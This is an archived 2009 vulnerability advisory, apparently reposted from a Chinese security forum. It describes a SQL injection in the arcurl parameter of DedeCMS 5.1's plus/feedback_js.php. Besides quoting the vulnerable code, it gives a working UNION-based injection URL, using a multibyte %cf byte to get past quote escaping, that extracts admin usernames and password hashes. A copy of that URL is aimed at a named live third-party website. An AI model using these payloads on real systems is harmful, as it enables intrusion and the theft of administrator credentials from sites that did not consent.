dedecms(plus/feedback_js.php)injection vulnerability-vulnerability warning-the black bar safety net

2009-10-12T00:00:00
ID MYHACK58:62200924985
Type myhack58
Reporter 佚名
Modified 2009-10-12T00:00:00

Description

Found by:Rainy'Fox&St0p Team:two fat network security(http://bbs.erpangzi.com) Affected version: dedecms GBK 5.1 Vulnerability description: 文件 :plus/feedback_js.php if(empty($arcID)) { $row = $dlist->dsql->GetOne("Select id From #@__cache_feedbackurl where url='$arcurl' "); if(is_array($row)) $urlindex = $row['id']; } Get variable arcurl,directly into the database query. Lead injection to produce,between for the php environment if you set magic_quote_gpc=on of the problem. Can be combined with the php multibyte encoding vulnerability construct. Use: <http://localhost/plus/feedback_js.php?arcurl=%cf>' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 as msg from dede_admin where 1=1 union select * from dede_feedback d where 1=2 and "='" from dede_admin where "=' After the test,draw conclusions,magic_quotes_gpc = On when the current statement also no,encoding is not yet a breakthrough Presentation: <http://www.yxwo.cn/plus/feedback_js.php?arcurl=%cf>'%20union%20select%2 0"'%20and%2 0 1=2%20union%20select%201,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1%20as%20msg%20from%20yxwodede_admin%20where%2 0 1=1%20union%20select%2 0*%20from%20yxwodede_feedback%20d%20where%2 0 1=2%2 0%20and%2 0"='"%20from%20yxwodede_admin%20where%2 0"='

! !